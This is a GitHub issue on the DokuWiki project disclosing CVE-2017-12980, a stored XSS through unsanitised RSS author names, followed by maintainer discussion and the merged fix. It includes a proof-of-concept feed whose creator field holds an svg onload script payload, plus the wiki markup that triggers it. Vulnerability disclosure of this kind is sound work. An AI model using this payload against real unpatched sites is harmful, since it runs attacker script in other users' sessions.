Skip to content

/ dokuwiki

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed #2081

Closed
trichimtrich opened this issue Aug 16, 2017 · 3 comments
Closed

CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed #2081

trichimtrich opened this issue Aug 16, 2017 · 3 comments
Labels
Bug Security Severity: Medium

Comments

@trichimtrich
Copy link

@trichimtrich trichimtrich commented Aug 16, 2017

Bug

Author tag in RSS/Atom feed is not well sanitized (with default config of SimplePIE, it'll not be stripped html special characters, dokuwiki uses the result directly). So attacker can force others to request a remote RSS/Atom feed contains malicious javascript to do requests in their permission.

Detail

/inc/parser/xhtml.php

function rss($url, $params) {
...
if($params['author']) {
    $author = $item->get_author(0);
    if($author) {
        $name = $author->get_name();
        if(!$name) $name = $author->get_email();
        if($name) $this->doc .= ' '.$lang['by'].' '.$name;
    }
}
...
}

PoC

remote RSS

<?xml version="1.0" encoding="ISO-8859-1"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
<item rdf:about="https://aaaapolitics.slashdot.org/story/17/08/16/1911253/after-losing-support-trumps-business-and-manufacturing-councils-are-shutting-down?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed">
<title>testing title</title>
<description>testing desc</description>
<dc:creator><![CDATA[  aaaa<svg onload=alert(1)>  ]]></dc:creator>
<dc:date>2017-08-16T19:20:00+00:00</dc:date>
</item>
</rdf:RDF>

dokuwiki document

{{rss>http://localhost/cc.rss 1 author date description 1h }}
@phy25
Copy link
Collaborator

@phy25 phy25 commented Aug 20, 2017

Reproducible at https://www.dokuwiki.org/sandbox:issue-2081. A fix is available at #2086.
@trichimtrich
Copy link
Author

@trichimtrich trichimtrich commented Aug 20, 2017

The fixed works well
@fgeek
Copy link

@fgeek fgeek commented Aug 22, 2017

Please use CVE-2017-12980 for this issue.
splitbrain added a commit that referenced this issue Aug 22, 2017
@splitbrain
Merge pull request #2086 from phy25/fix-2081 CVE-2017-12980
Loading status checks…
f883db1 
Fix RSS syntax XSS bug (#2081)
@splitbrain splitbrain changed the title [Security] Stored XSS in xhtml.php with RSS/Atom feed CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed Aug 22, 2017
@splitbrain splitbrain closed this Aug 22, 2017
bug added a commit that referenced this issue Aug 22, 2017
@phy25 @bug
Fix RSS syntax XSS bug (#2081)
9011f4a
bug added a commit that referenced this issue Aug 22, 2017
@phy25 @bug
Fix RSS syntax XSS bug (#2081)
fadcc39
splitbrain added a commit that referenced this issue Aug 27, 2017
@splitbrain
Merge branch 'master' into retrytests
Loading status checks…
e8a5162 
* master: (407 commits)
  do not export the appveyor config
  Added appveyor config for automated windows testing
  Update check supports HTTPS
  fixed some style errors found by scrutinizer
  removed unused, empty files
  some cleanup fpr set_metadata test
  added one more test for internal links
  parsertests: replaced var keywords and added type hints
  Fix p_set_metadata damaging contributors with numeric ID
  Add tests for array_replace part of set_metadata
  Fix rendering null $language going to GeSHi (fixes #2088)
  Fix RSS syntax XSS bug (#2081)
  Fix sanitation of $language for code highlighting (fixes #2080)
  translation update
  fix(config): empty string is valid for numericopt
  removed old tpl_content_core method
  updated composer dependencies
  Removed progressbar from searchform
  Release preparation
  translation update
  ...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug Security Severity: Medium
Projects
None yet
Milestone
No milestone
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
4 participants
@splitbrain @fgeek @phy25 @trichimtrich